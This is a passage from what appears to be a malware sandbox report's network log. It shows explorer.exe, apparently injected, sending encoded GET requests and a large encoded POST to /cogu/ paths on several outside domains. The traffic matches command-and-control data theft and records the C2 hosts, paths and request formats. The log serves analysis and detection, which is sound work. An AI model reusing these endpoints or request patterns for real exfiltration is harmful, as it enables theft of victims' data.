VEqLjT~MP4x7M7RYyUpaHrRqf1Y26AZqNgwfRGk3Gro4bWXob_K3rnAgpCoZH0v8jx3Es541aD2g3038BtIYMR1oVPK1F-muFISPFE1UegAOlwPxtV0BZjXJHvzD(cwdRkvQAQzBhYrZslgVyTQ_SUe51VhvQJcWQijxZ3eXnS(q3rrYaCm3(0F4F6Q4RvJmp3Ry9nYaf3CXAMMsIjofFePtYO0Mqe~MmNeAbnRCIp4LwE4f9iWNcJklR1JLqmqQ1lnLxZUXlYIVrG9fCFwuKrBi~mJAi428PWqqo-h6uwOxvwX3gcbYxHTXM_iKVT7rJynLWC8DndZT35ZiKa~Fk3paUVbOc5giUwAbZ99KjAf68Xgjthjb4YEPBr2vbwnqlXIJcx3-VLzIiqJplRXcJkcFIn3QxmIEIeTWU0FljXWrs7Wwu4fdriiG(1rIh2G3Qfa7JSm7DPhL7qURCUIlTZshrZP898w7nArxA4cCrqKM7L8zsmriQ8t6NR8vGvEJ8kCd2lJ1SNPR5DBr5hMXEQc0Y7Br7w7V8llJNRsO0T7hNVB2VycX5Ox-uezWFGz47K2e1HuPJtHfS-D7d9X7XTKnHyyYPzKjnZVsyY6vacL0LvY-yXw47dfzK7Hxnv73p_OgvqYVVLkPNnxejgZVpK6q4GNVtrwGbtuBC0EeAs~z1QpKW0PpF4~r5IqpVTkpj5QjWmLV23UyPjB6X2hjpjYFN_ThrFVyvNH50SPD4Rzqz3FZSVc86P5ztDz025EmrfAcv4tix4rvYxmz~W9kBx2j~7SQI2631AtongmXTQI3A0zz3ngwo3iqPDao7jdY~DrceBPnBQriGMYA50CgB8yuvXHQjZ03qWfpSj5182QsrwVq5JFH62iMyMeIsNV4OfUbcn(jLet1jiA3BirP1p2qMceTIRQ4O0sMRC4qvcZ6GMfSH_SbiVg-2G8pUt9g4NTwgJyOg4Gxv1lPMqu7gdoWTgd9z8wIm5k8cQTmMOQ3oCCVCBQZ9t(9vDR73geWoeRapqVNnyxIB_DY87A7P2gf~zmpSVf3s1kUoxianDDmnbykTN~5A4fAz_goEz
Oct 13, 2021 15:53:16.101653099 CEST	8155	OUT	Data Raw: 68 45 74 37 68 67 77 65 31 61 46 72 30 6d 42 4b 56 62 61 4a 37 39 4e 37 54 53 65 34 31 69 31 5a 56 30 61 6b 53 42 74 4a 75 54 63 46 75 35 6f 72 57 39 52 44 7e 36 6e 70 66 51 64 4d 42 4d 28 78 4c 31 41 49 74 35 66 4d 6e 6a 34 34 72 4d 39 31 30 4c Data Ascii: hEt7hgwe1aFr0mBKVbaJ79N7TSe41i1ZV0akSBtJuTcFu5orW9RD~6npfQdMBM(xL1AIt5fMnj44rM910LrAaJcKYtkwJpKPnjTtxvOxvjLSmLlbdvqHtBMoaCconh2yshIS107G6t9K78td9JMKZWpqyHYZSCYOUokW(tNjeBbe(WV-WbehjDMaVPMhl4T1bsXBppqCs7ht(OV3Pn5XmGHadfZgOibOc20bBF3vnfRsBi~BWaW
Oct 13, 2021 15:53:16.101697922 CEST	8158	OUT	Data Raw: 78 76 43 52 43 63 76 64 5a 4f 42 66 62 5f 47 79 48 7a 76 67 43 46 34 50 78 57 65 48 35 42 36 77 68 4b 42 34 78 5a 6c 31 77 53 4c 42 77 78 76 43 49 50 32 34 4a 76 7e 68 43 67 66 32 74 45 55 41 6c 38 4d 61 5a 38 68 4d 30 73 6b 6b 58 43 28 69 57 76 Data Ascii: xvCRCcvdZOBfb_GyHzvgCF4PxWeH5B6whKB4xZl1wSLBwxvCIP24Jv~hCgf2tEUAl8MaZ8hM0skkXC(iWvSYfrMQQ5xkr82sflTlXYjLNdU4wpn9FXq44gMZ4eC-fs(BaPZTSkx6P0nmbDLXn_NAK3(xJENgzkO1NIKjBTqM78yseiXXKMl2Q5GDGpiYSLm-~G3bRtCtXp4JzAN-qt4Cne47M2gcYyD9WnF6ydnpOEJEmrv261J
Oct 13, 2021 15:53:16.112705946 CEST	8161	OUT	Data Raw: 70 6e 7a 6f 34 31 79 42 48 76 6e 52 4a 70 42 46 6d 6d 52 65 28 45 45 4f 66 46 68 34 53 74 7a 5a 42 6b 52 62 4b 36 59 39 31 65 72 6f 30 49 74 34 6e 4b 74 64 66 52 6f 61 57 79 67 66 46 33 6e 57 64 4c 31 61 43 43 67 53 75 73 54 55 5a 4f 56 72 30 6f Data Ascii: pnzo41yBHvnRJpBFmmRe(EEOfFh4StzZBkRbK6Y91ero0It4nKtdfRoaWygfF3nWdL1aCCgSusTUZOVr0odCfejlP8P6rm5v~M16(rBUw14_3TMRKeVByOSmzzd_vdyylBQkLXBe8GiH~NQEa_mmzTkHyZ7bpJKGA3qS(KKj(MuxBRCWuCw-k-g-XMZ9o4J3XpJ8Xcmbi4O9Em5Zw8Vq900UJHaHiRgql0VYp2P_08Rgm9v65jT
Oct 13, 2021 15:53:16.112886906 CEST	8162	OUT	Data Raw: 6e 37 47 78 6e 57 78 54 33 70 34 36 36 5f 72 79 49 45 72 31 39 73 79 57 59 64 78 71 28 6e 41 42 5a 48 66 74 79 31 44 68 58 45 6f 78 63 6e 61 48 51 62 55 4e 73 4b 6d 47 45 47 66 48 6a 51 7a 41 42 37 72 51 6c 7a 6f 53 30 41 34 6d 66 66 66 43 76 33 Data Ascii: n7GxnWxT3p466_ryIEr19syWYdxq(nABZHfty1DhXEoxcnaHQbUNsKmGEGfHjQzAB7rQlzoS0A4mfffCv3yGk00YL0uWp7t7qsT-RwsR7LU1bdVswsDyp1PtzJ2NiTxrOsN647x9bEL4bV1ypz5x6SPSYvmpH3XAXI6kb65z2Zn2T8WBPBQUxv2LogrDnTvt5vTnKvrWuuJ7lKHnfRwXOp~Au9nIYYF-D46OtiRzWoyKCpC1gdT
Oct 13, 2021 15:53:16.113059998 CEST	8169	OUT	Data Raw: 4e 2d 39 35 71 46 55 58 52 38 57 6d 49 62 49 53 31 51 33 65 77 2d 65 2d 45 32 6c 78 76 79 4c 32 51 31 4a 71 6e 4e 6a 70 69 73 7e 75 67 47 73 51 36 6f 71 4e 28 79 59 48 76 75 41 37 57 77 53 63 4f 51 77 66 39 76 4e 31 55 71 6d 4a 46 4d 44 35 38 67 Data Ascii: N-95qFUXR8WmIbIS1Q3ew-e-E2lxvyL2Q1JqnNjpis~ugGsQ6oqN(yYHvuA7WwScOQwf9vN1UqmJFMD58gQMU0zwe3OyyAh8xAQ5XiGMSy9EKUr4hZExG1FJDTOFqnXOSsnclWMgPSEmvWuQg-2_rlFOzehTZuwX5DRBwwZUVPiBiy30Cy2J(gU68A8uf47U4gnX3hcnRj1NUAj01n0NTvcp0Y2nyg8AIGGQlAWwqdQpGmJlM6I
Oct 13, 2021 15:53:16.113233089 CEST	8171	OUT	Data Raw: 51 79 36 66 4b 78 43 70 43 6a 4e 69 6a 78 4e 4e 37 63 58 73 57 4b 47 54 52 43 66 62 49 34 70 6b 33 32 50 44 62 46 6d 71 42 62 61 4d 55 56 68 62 32 79 37 32 45 53 42 55 54 6e 6c 54 37 47 74 79 69 78 76 4f 6d 50 35 66 72 61 45 5a 6b 74 59 49 70 73 Data Ascii: Qy6fKxCpCjNijxNN7cXsWKGTRCfbI4pk32PDbFmqBbaMUVhb2y72ESBUTnlT7GtyixvOmP5fraEZktYIpsOTjK(-TrblHuJd~13SOnQhJLoMUJJGIsURgNrOj6S1mP55cXduUy0HkACIDCtMQ9zJOQzZKBlShFDflrrGvAP7rgC4zlXA95JLM3hP15v7yo9PbVFLkpb_~FJA9esrieoASjyWLgr1juR9WFAwJGYm69ag3zKfyjI
Oct 13, 2021 15:53:16.113416910 CEST	8184	OUT	Data Raw: 35 48 4b 62 6c 4e 37 2d 50 67 62 66 6c 35 63 44 4a 5a 38 47 7e 78 57 73 35 37 38 62 50 35 36 4c 69 75 65 56 7a 66 37 69 35 35 4d 50 75 55 4e 70 41 2d 28 31 57 7a 79 48 6a 4b 72 61 58 4a 43 68 50 4f 79 37 44 6d 50 2d 4d 72 68 68 4c 76 64 63 31 69 Data Ascii: 5HKblN7-Pgbfl5cDJZ8G~xWs578bP56LiueVzf7i55MPuUNpA-(1WzyHjKraXJChPOy7DmP-MrhhLvdc1iMMM1vX~bITYJgkNy6ormudapD133V1zE3TTEOdYit7ozIvVn~bMgPH4dU6MvDDEskjjNyNcKK3PAR9WrlHvnUByhk5TezruD1hmSqmT0ontmhuWJB8bhmZQ5(ScJS0Wi02exoPrp0bSVYsNV8IoBi1v8qG1KyfKQm
Oct 13, 2021 15:53:16.123554945 CEST	8185	OUT	Data Raw: 47 73 62 6f 5a 77 6e 67 66 4b 70 6f 64 74 4f 66 57 56 32 55 6c 46 75 45 75 6b 34 6d 35 4d 34 6f 58 2d 31 76 58 4b 77 2d 73 69 54 78 28 57 31 74 65 64 76 38 5a 71 49 5a 48 43 53 68 6f 75 57 51 28 37 61 49 66 43 6c 6e 33 2d 69 4a 4f 79 7e 47 7a 56 Data Ascii: GsboZwngfKpodtOfWV2UlFuEuk4m5M4oX-1vXKw-siTx(W1tedv8ZqIZHCShouWQ(7aIfCln3-iJOy~GzVL03QIctqwREu42QiaAdmwsz08PJRfm3yHUM4w418YtFQDcs13nRe4JfBYIcrAv0S~HIyYqce3uWXZCfTrB9-rBTnmCuIZPUNcEHvotwktmClvF5i(GJgPB6fmj9b3WPLOxfKvm7e7cT2AA~FzOl8jgFobHtAP7Xuh
Oct 13, 2021 15:53:16.123733997 CEST	8187	OUT	Data Raw: 6b 39 32 72 32 49 77 58 51 37 48 45 54 62 52 75 31 58 56 43 6a 77 59 4c 70 33 50 52 64 64 68 43 43 39 6f 68 74 4f 7e 63 43 66 32 61 47 4d 55 72 55 74 6b 6b 39 41 42 70 50 79 76 35 55 38 4b 53 72 52 7a 2d 34 46 42 62 71 78 6e 44 72 51 67 43 5a 77 Data Ascii: k92r2IwXQ7HETbRu1XVCjwYLp3PRddhCC9ohtO~cCf2aGMUrUtkk9ABpPyv5U8KSrRz-4FBbqxnDrQgCZwUwlPJ4U8IVEK95xaQBFMfkt93PAKZtExqGaJZWGKVm4NL1XkqNOLyLua(i3E2k59Em78p_rDaeJb8_VZ7C1q(J0psYMzFdvay55cuyAnpxgNJEdls29QJASTNOaVYq2hDIdHTsoTZivXwcuF08yb1KSPdOyrVF8AI
Oct 13, 2021 15:53:16.123908997 CEST	8188	OUT	Data Raw: 4f 34 54 59 52 46 43 53 4f 57 4b 67 61 67 53 6f 28 31 61 33 48 44 6f 50 7e 51 6f 73 4b 53 7e 56 54 49 72 74 28 70 6b 72 78 79 71 38 63 68 56 34 5a 51 7a 6f 4a 74 79 79 49 55 36 49 65 43 63 4f 7a 6d 57 4b 28 72 73 66 64 45 44 6f 78 36 47 74 61 72 Data Ascii: O4TYRFCSOWKgagSo(1a3HDoP~QosKS~VTIrt(pkrxyq8chV4ZQzoJtyyIU6IeCcOzmWK(rsfdEDox6GtarmA1XNFHkh_bUmO8WL3sPDcR8CCfbQ7a8SYnJ834QWKR2f6s4u28ZSXhDL9FtBa7_1MxLSXUMSAiLgnLtqCBpDVu4N-Nvl_0TNaJhmvF0qywE9Bd0e8QZDru7xfsfJCCNWsgY97sOKu832Vs1ntlMS7XwkBgUPcNCT
Oct 13, 2021 15:53:16.210266113 CEST	8280	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Wed, 13 Oct 2021 13:53:16 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Y87GzipOsbQOPSxMpfesXqqXCDvsTDfD1AeWpCpat7WukCkcMKEF11b9fZWZ0uyKaWz3/7coB7M48zuYyW3r+g Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.11.20	49851	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:16.113117933 CEST	8169	OUT	GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1 Host: www.cacaolixir.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:16.219923973 CEST	8281	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 13:53:16 GMT Content-Type: text/html Content-Length: 275 ETag: "615f9601-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.11.20	49852	66.96.130.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:21.325165987 CEST	8286	OUT	POST /cogu/ HTTP/1.1 Host: www.fishermandm.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.fishermandm.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.fishermandm.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 61 76 4e 71 7a 54 32 57 79 46 4d 48 77 77 31 62 6e 69 61 41 47 6d 45 69 34 76 6b 4d 37 38 28 31 49 2d 76 63 4d 56 6a 53 36 47 50 34 36 68 62 61 4b 56 5a 65 4b 6b 46 4f 43 36 38 6b 68 6e 4c 67 58 62 6a 6a 48 59 4e 58 76 79 54 4d 56 73 6e 42 4d 71 28 52 77 69 77 43 32 38 61 44 4d 54 77 42 78 72 6c 4e 6c 4e 75 62 48 35 59 49 6a 4f 48 70 6d 6d 70 4a 77 6c 48 4b 5a 62 49 37 4d 53 37 5f 6c 66 31 34 77 59 63 6c 46 33 30 75 61 55 58 51 68 75 58 37 37 69 71 76 58 4f 58 66 4f 44 30 69 62 47 6c 35 6c 33 6b 5f 35 55 32 49 7a 76 43 76 68 51 35 62 62 75 41 66 63 6a 30 6f 62 38 6e 4a 4a 43 31 6b 70 4a 4c 4d 65 32 7a 55 68 4f 4f 52 4f 43 44 75 4b 55 52 70 61 44 37 7a 64 35 50 6d 7e 46 62 35 75 64 67 35 6e 48 57 59 34 59 50 38 38 4f 66 75 76 73 42 6d 38 48 65 6b 67 31 47 65 62 36 31 69 39 54 70 78 45 52 68 44 65 62 4c 65 39 39 41 34 67 54 47 46 71 4d 7a 37 30 35 45 77 4f 4f 66 52 6b 51 33 76 6d 77 73 37 7e 69 6f 5a 68 4a 4c 69 56 73 49 33 4f 62 42 7a 45 53 65 50 59 42 4e 37 4b 78 76 64 67 4c 28 47 46 77 6e 48 33 63 75 43 58 76 59 38 4e 53 6d 4a 6a 35 59 7a 36 49 4c 73 31 6c 4d 4d 67 59 49 51 61 68 48 71 35 62 6c 38 37 33 6c 38 48 66 51 61 4e 4b 33 54 77 48 54 4e 78 79 6e 33 72 50 74 47 4e 71 66 5a 78 39 6a 47 30 58 62 4f 51 56 68 74 68 59 50 69 61 67 6c 71 4f 6f 31 6d 5a 39 7a 44 57 74 36 56 55 64 64 50 71 31 4c 6a 35 6d 36 32 32 46 33 4c 58 6f 4f 75 67 44 63 61 28 51 61 6a 6d 48 4f 36 5a 37 7a 6e 72 77 30 6e 53 38 5a 4c 4e 79 74 78 6c 45 31 6d 4b 4c 49 79 6a 45 49 31 76 76 7a 39 73 30 75 69 79 74 53 78 39 37 41 42 58 58 63 5f 45 51 50 2d 69 56 58 4e 64 4f 33 48 63 53 52 57 74 6c 49 66 62 69 59 57 7a 55 31 50 34 53 6a 69 51 70 58 42 4f 32 59 4f 65 65 54 77 46 69 7a 50 74 4d 6e 31 70 61 42 39 69 77 79 4c 73 50 64 4b 4e 63 37 78 72 37 62 4b 5a 33 67 74 76 4f 66 79 7a 75 72 69 44 43 48 42 78 39 49 65 6f 46 50 59 41 5f 6b 44 49 64 41 4b 49 58 6e 37 31 52 76 46 65 44 78 71 52 34 54 48 42 62 68 4d 4a 37 4a 55 43 55 55 66 4f 6f 33 61 39 2d 49 52 59 43 68 76 5a 71 78 55 70 6c 4f 32 6f 64 35 6f 67 68 55 73 77 75 6c 54 68 6c 41 53 47 78 4b 78 59 76 48 4e 59 6e 43 52 48 66 44 36 4d 45 6d 35 66 65 69 74 78 31 53 6d 47 53 4d 30 4e 75 38 61 42 44 28 41 51 31 79 6f 56 54 72 59 57 70 70 6d 4d 68 43 6c 4c 74 51 6f 4a 6c 64 6d 59 67 67 57 61 4c 31 6d 58 41 58 6b 53 39 44 63 28 77 69 6d 32 37 74 63 64 30 7e 50 31 75 6c 54 54 4d 43 5f 4f 35 31 4e 32 69 28 57 37 35 48 55 43 52 35 75 49 67 42 62 58 74 66 41 54 79 67 55 49 56 68 44 53 32 77 4c 7a 79 54 5f 66 6d 54 48 6a 4c 50 6a 34 68 78 4b 4f 5a 77 53 58 77 41 66 79 4f 67 51 54 55 64 54 6f 2d 41 75 31 52 70 6f 58 39 38 7a 6d 58 61 79 7a 4c 4b 68 4f 55 46 61 37 49 7a 36 4b 54 74 44 49 52 69 37 59 43 74 45 34 53 51 4e 6e 6c 74 36 42 6b 70 48 52 48 54 79 7a 64 55 78 7e 4d 74 6d 41 56 43 66 59 71 52 56 38 69 54 6e 76 30 54 6b 36 6a 35 62 45 34 7a 36 66 61 73 7a 31 41 4e 30 4a 70 76 38 53 75 64 6d 57 5f 63 52 76 6c 6b 41 58 66 47 2d 6e 66 54 55 49 55 66 45 6a 34 45 4b 70 5a 7a 30 38 6e 7a 2d 48 54 4d 31 67 33 69 5a 6b 61 57 30 74 51 5a 58 4a 30 62 77 6f 64 39 45 31 41 4b 42 32 58 62 56 65 69 52 53 78 34 46 6c 31 7a 28 5f 77 56 6e 45 44 4a 72 50 51 59 4a 71 39 46 35 67 75 6a 43 41 58 33 4c 52 34 32 70 57 59 68 51 71 6b 62 43 6f 62 77 56 49 35 39 77 34 71 35 36 76 34 76 5a 68 65 41 70 76 54 39 46 73 4f 61 6c 6f 47 62 46 70 65 35 69 31 50 67 7a 4c 75 73 71 76 46 4f 79 53 53 4b 4f 37 54 55 62 66 39 45 62 48 72 44 30 51 6e 68 79 50 6c 34 4a 59 67 33 54 44 69 44 48 52 37 72 6f 4f 67 67 38 55 6a 4e 69 5a 28 5a 7e 74 56 51 75 5a 56 31 4b 64 4b 39 36 78 75 57 6e 64 50 6a 51 58 46 47 71 79 79 35 58 46 53 38 34 7a 79 2d 46 57 6d 77 52 6f 6f 4f 6c 37 41 61 6b 6a 56 68 37 70 71 43 32 54 39 70 39 4d 4d 67 52 2d 31 77 53 2d 41 70 36 6c 55 57 63 54 53 54 56 67 73 59 4e 33 6c 4b 45 33 39 44 4b 51 31 76 4f 63 70 36 47 55 67 64 52 48 36 64 7a 35 68 59 72 5a 75 4d 43 75 43 34 74 6f 5a 42 72 71 33 59 67 51 37 69 47 59 34 6e 54 6b 55 4a 6e 74 7a 34 6b 64 4f 37 65 47 6f 62 7a 75 7a 5f 54 32 76 72 43 4a 6b 68 61 71 71 57 65 49 28 4b 67 56 7e 50 6d 72 4b 4d 33 50 78 6a 71 79 75 4b 47 74 33 61 6a 77 55 4c 4d 38 4a 43 69 4b Data Ascii: E6=avNqzT2WyFMHww1bniaAGmEi4vkM78(1I-vcMVjS6GP46hbaKVZeKkFOC68khnLgXbjjHYNXvyTMVsnBMq(RwiwC28aDMTwBxrlNlNubH5YIjOHpmmpJwlHKZbI7MS7_lf14wYclF30uaUXQhuX77iqvXOXfOD0ibGl5l3k_5U2IzvCvhQ5bbuAfcj0ob8nJJC1kpJLMe2zUhOOROCDuKURpaD7zd5Pm~Fb5udg5nHWY4YP88OfuvsBm8Hekg1Geb61i9TpxERhDebLe99A4gTGFqMz705EwOOfRkQ3vmws7~ioZhJLiVsI3ObBzESePYBN7KxvdgL(GFwnH3cuCXvY8NSmJj5Yz6ILs1lMMgYIQahHq5bl873l8HfQaNK3TwHTNxyn3rPtGNqfZx9jG0XbOQVhthYPiaglqOo1mZ9zDWt6VUddPq1Lj5m622F3LXoOugDca(QajmHO6Z7znrw0nS8ZLNytxlE1mKLIyjEI1vvz9s0uiytSx97ABXXc_EQP-iVXNdO3HcSRWtlIfbiYWzU1P4SjiQpXBO2YOeeTwFizPtMn1paB9iwyLsPdKNc7xr7bKZ3gtvOfyzuriDCHBx9IeoFPYA_kDIdAKIXn71RvFeDxqR4THBbhMJ7JUCUUfOo3a9-IRYChvZqxUplO2od5oghUswulThlASGxKxYvHNYnCRHfD6MEm5feitx1SmGSM0Nu8aBD(AQ1yoVTrYWppmMhClLtQoJldmYggWaL1mXAXkS9Dc(wim27tcd0~P1ulTTMC_O51N2i(W75HUCR5uIgBbXtfATygUIVhDS2wLzyT_fmTHjLPj4hxKOZwSXwAfyOgQTUdTo-Au1RpoX98zmXayzLKhOUFa7Iz6KTtDIRi7YCtE4SQNnlt6BkpHRHTyzdUx~MtmAVCfYqRV8iTnv0Tk6j5bE4z6fasz1AN0Jpv8SudmW_cRvlkAXfG-nfTUIUfEj4EKpZz08nz-HTM1g3iZkaW0tQZXJ0bwod9E1AKB2XbVeiRSx4Fl1z(_wVnEDJrPQYJq9F5gujCAX3LR42pWYhQqkbCobwVI59w4q56v4vZheApvT9FsOaloGbFpe5i1PgzLusqvFOySSKO7TUbf9EbHrD0QnhyPl4JYg3TDiDHR7roOgg8UjNiZ(Z~tVQuZV1KdK96xuWndPjQXFGqyy5XFS84zy-FWmwRooOl7AakjVh7pqC2T9p9MMgR-1wS-Ap6lUWcTSTVgsYN3lKE39DKQ1vOcp6GUgdRH6dz5hYrZuMCuC4toZBrq3YgQ7iGY4nTkUJntz4kdO7eGobzuz_T2vrCJkhaqqWeI(KgV~PmrKM3PxjqyuKGt3ajwULM8JCiKYIJvX7ufbVf2hQ(t5d15o5z_neA9UXfNqSN7WNGEY20Ig-Z9m0IqvK4Bn98fLPva(tuKriIvsnDtUDL0WDEfOtkwRsUHo3tLeZb6luL3WC2_O10ULYHqzrLZKZZrl5V-jr53B1Ey3WcWIRRG2f09VrMBHLcywpEhOQhztUvkMvIGyT2Ml7SKqW~8HZMFWIWx12ObEUAoOuRpjBqDx2kBXpABPUuQjm7p7vJkBR7I6qNfXE2jq3MVuhjv4VSrlo1NtkpMGROgFTqyjm6bU4CQEYFw6JJQuGu_2-s9a6l9m_PpTWhlEGYK2h68bT29Ilu71jOfMpJvbf9s5rprEJEwOMjOe3i_zpTKrmBe8ZoxUHrwvteGmIG8Xz98EPRYT58XWSY3lmKm0TETzeVtbLFNTpdYAgCTMB9cYsQSE6uOnrKY8wOK8DXDlY6eckU0PpZGLvECqjKZUgzACzgIomAoS4tu~IYGUlUEJ0cLZ0C4Flf2jhGFZ9GaJtMl0XHvPeQ0n3l4u1hB1lN9~6iM56JQE9d2O4u37CsmjmJDnRdrnMJvkLeTHEOXKD8l4gVlCLc_KIsUl7lMX5oCDw5lpJbNNb52SWW0E9uz~KgCIVpalomP2ZYlqvrVgIejALVLKsFKRX(jBf8jEM4zJQi6Nq~4Ar30ZPEkQMAFMx8OGj(6ykJoDWjnVjcApiMYPKgcj7m7YQB20b1jsXaP(xrVW5MOJxp8b4yXJzmhPX1PvaVODHKDziOGX5dw1xOC76H1vwRMnStbd25gfA6bSo2IduqmSmRobQKj1Z1-AxEnA_KySN5nM3V66-2atDGNuqyPAf4qc07pyo4mfHTc37F2VH9FI9mL36tz8XkX8CsxZjg2YoQD8eSC0Jtcls0hmLXWk1dQVIBX2-x7jR1wMlvd~HtPK64tVeYReMHF(SoLOaCKySjYgy0AbP1BEjlrAvYXQqqIIVFXsuj4KvKCNGrTe6G4ELJBx5vRSkBFWWIRshK_cHzoIUVgD7P8KrkhRnSFUVZT~HbER9E_paooXqHM651oSe(ctX9e0bxIDPJrqu4NGmUvkKQlUJbxuzSYWi~sE_X_S3t57zNx6D0bQILVe_G59tN_C_N3WM(VVg3Mbtsbfjpvpq6-Oju1VXZQVHprqsVarN8Nuh5LeWLdLHYeP3UcKRtXzu57CMbF(4O0OjDCGc~JKmHjAnt69vVBuhpUjIzpx3xNbbYUWhbB~EUIRFcCZqpw6Jws2B3PbKcbQgmWBJ0_HH2ayM5y~ZzZkUGovkSMXanAl_QshV8_djHrShdvnU4XpW~aXksXQpOweXKK2hN1hHqSRTMa3eVolVh9jmrRN_nat9rfpNxFzdvF9J1p2zxMtVyvpnUxuUnoF-tL~yccexFPWLjNzRcoSvgpL6da2u(eXnqyRM7k(Vome4HiaCoasc2W6D~kz5GYHRfXEzb6igFSY5rZ1893dxS7f2gMMZ3-Rv(7~_OhCYtijCTPwSDG5WXfx0fjaHXEYgebbnIlJSzRiVNKVbeYxhardC9eghqzvHRJ0ImsRBqvcaRG9A6EMPOIoAUV2FFJ7cYUaRR3tPujpoCA(dsJqq6Y0TgL4b5G55DsEmp5PJLvhOE2JA7QlBMR96jtlX4Tq8BdLbcoAxNfeYYKlaxmDArAmXf1OTmdGxYMGZZBRIsUGM7xpTpKtUNwEmkjyBXVErBj0rp2nMBwVL(_9f~7FZo8cD6S~c6GxwmmoKFTtvKn4dKD7X(mpJSu4nyURt6_r88pfZUHzFOt3Kzn(XCCbnmgxSEKEXvKzVSxu_1koMtg0_iSMyE8YHJWmuYFWZwXHQF9URJcDa5ewSkQ6Y8YuZ0RDovj89fETrcv6WjVe3dfnAMofYOLcNREilVNfyCpcvEO0t7gz0LrOchydy~BOmHUUQrKAO1OasWrW90qoagIYIWgkVvj1blOH69QF2AQR12c~SePPk8i0HV6PMKfrxVmpDTER5jp4Nbw6ef68TxzfKWhZQHsrQPtJ5LFtfC_fHd3Nu5Zy-rVJeowHIusZt4LjJV0557Ny4T9QjVCsi4ocZD19kU7vPneZod1AovK3c5CUc2CuPuhG59_5caPyFaGXjNVM5gtyJg9lM7wrXC_mAOPRwAe32ZQnFsrGOMU112MQXiNMS49kNI06yO61i3Fgugoi-9GyU1XaUNqm-rKwJj80wwmHE0qbxzL6Pe2uewl8zzQ2RhXYwbkUOFafTOc51yjI2JtZqE
Oct 13, 2021 15:53:21.325254917 CEST	8295	OUT	Data Raw: 66 28 77 54 48 76 6f 7a 2d 58 6d 6d 58 43 65 38 48 6c 6b 46 4d 33 75 6e 51 4d 67 70 44 54 4e 55 58 36 32 4b 54 70 74 44 42 30 54 68 65 54 44 48 54 58 70 55 42 7a 41 54 5a 67 72 42 71 6d 70 67 37 38 51 6f 4d 41 75 77 6f 53 48 46 31 74 6f 57 4d 52 Data Ascii: f(wTHvoz-XmmXCe8HlkFM3unQMgpDTNUX62KTptDB0TheTDHTXpUBzATZgrBqmpg78QoMAuwoSHF1toWMRu33EYyYVkNxXezeu_UENTnQHLH30kAy8nVFkjxWP_80O2OKznxfaislEahkvYHTe60ryYWIU8tyjNb3fbC7sZ5riIVehiyZl0Ks5yf_i6Xrr0NzMFM-RUPS1X3xdF22SkKHK9VU3devAxEmp2ohICWCjp7J0bZico
